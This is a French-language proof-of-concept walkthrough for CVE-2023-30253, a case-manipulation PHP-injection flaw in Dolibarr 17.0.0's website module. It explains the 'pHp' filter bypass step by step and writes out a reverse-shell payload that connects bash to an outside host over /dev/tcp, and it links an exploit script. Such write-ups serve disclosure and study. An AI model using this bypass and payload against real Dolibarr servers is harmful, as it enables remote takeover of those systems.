
Dans Dolibarr 17.0.0 avec le plugin CMS Website (core) activé, un attaquant authentifié peut obtenir une exécution de commande à distance via une injection de code PHP contournant les restrictions de l'application.
CVE-2023-30253 est une faille de sécurité dans le logiciel Dolibarr qui permet aux utilisateurs authentifiés d'exécuter du code à distance en utilisant une technique de manipulation de majuscules dans les données injectées.
Cette vulnérabilité peut entraîner une exécution de code à distance non autorisée par des acteurs malveillants, constituant une menace sérieuse pour la sécurité et l'intégrité des systèmes concernés. La vulnérabilité a été corrigée dans Dolibarr 17.0.1.
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
La POC suivante montre comment obtenir un Reverse Shell manuellement.

Après connexion en tant qu'utilisateur de test, nous pouvons créer/modifier le site web.
.png)
Créez d'abord un site web, puis créez une page.
.png)

Après avoir créé le site web et la page, cliquez sur l'icône des jumelles, cela ouvrira notre page créée dans un nouvel onglet.
Maintenant, cliquez sur Modifier la source HTML.
.png)
Ici, nous pouvons essayer d'ajouter du code PHP, mais il y a une sorte de filtre qui nous empêche d'écrire du code PHP. Cela peut être facilement contourné en modifiant le format du mot php.
.png)
Après avoir changé le format du mot php en pHp, nous pouvons voir qu'il est sauvegardé avec succès.
.png)
En allant sur la page, nous pouvons voir que notre code PHP inséré fonctionne.
Maintenant, pour obtenir un Reverse Shell, configurons un listener netcat.
.png)
.png)
Ensuite, ajoutons notre code de Reverse Shell <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>
Maintenant, ouvrir le site web nous donne un Reverse Shell.
.png)
Nous pouvons utiliser le code Python pour simplifier le processus.

Configurez un listener netcat.

Exécutez le script et nous devrions obtenir un Reverse Shell.

Auteur du script : https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253